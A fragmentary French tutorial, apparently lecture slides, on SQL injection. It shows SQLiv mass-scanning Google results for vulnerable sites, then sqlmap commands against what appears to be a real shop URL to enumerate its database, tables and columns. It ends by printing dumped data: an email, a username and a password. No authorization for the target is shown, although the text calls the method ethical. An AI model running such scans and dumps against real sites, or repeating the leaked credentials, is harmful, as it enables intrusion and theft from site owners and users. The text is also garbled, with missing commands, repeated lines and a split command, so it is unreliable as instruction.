SQL Injection
SQL Injection
SQL Injection
A : OBJECTIF
L'objectif principal est d'améliorer la sécurité des données afin de les protéger
contre les accès non autorisés et les menaces potentielles provenant d'entités
externes, conformément aux meilleures pratiques et normes du secteur.
Tapez les commandes ci-dessous dans votre terminal pour installer SQLiv :
SQLiv sur Kali Linux (/usr/bin/sqliv) : scanner vulnérabilités SQL via 'sqliv'
dans le terminal, détecte et exploite les failles d'injection SQL de manière
éthique.
SQLiv explore par défaut la première page de Google, soit 10 sites, mais avec
l'argument -p 100, nous analysons 10 pages (100 sites). Avec l'exemple d'URL
donné, des résultats de vulnérabilités ont été obtenus.
Après avoir identifié une cible vulnérable à l'injection SQL avec SQLiv, nous
utilisons SQLMap pour l'attaque. En commençant par révéler le nom de la base
de données, nous explorerons ensuite ses tables et colonnes pour extraire les
données.
URL cible : http://www.acfurniture.com/item.php?id=25
Modèle de commande :
~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D
acfurniture -T paramètres --columns
~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D ac
furniture -T paramètres --columns
E. VIDE DONNEES
Modèle de commande :
Email : [email protected]
Nom d'utilisateur : Handsome
Mot de passe : 9HPKO2NKrHbGmywzIzxUi
RESUME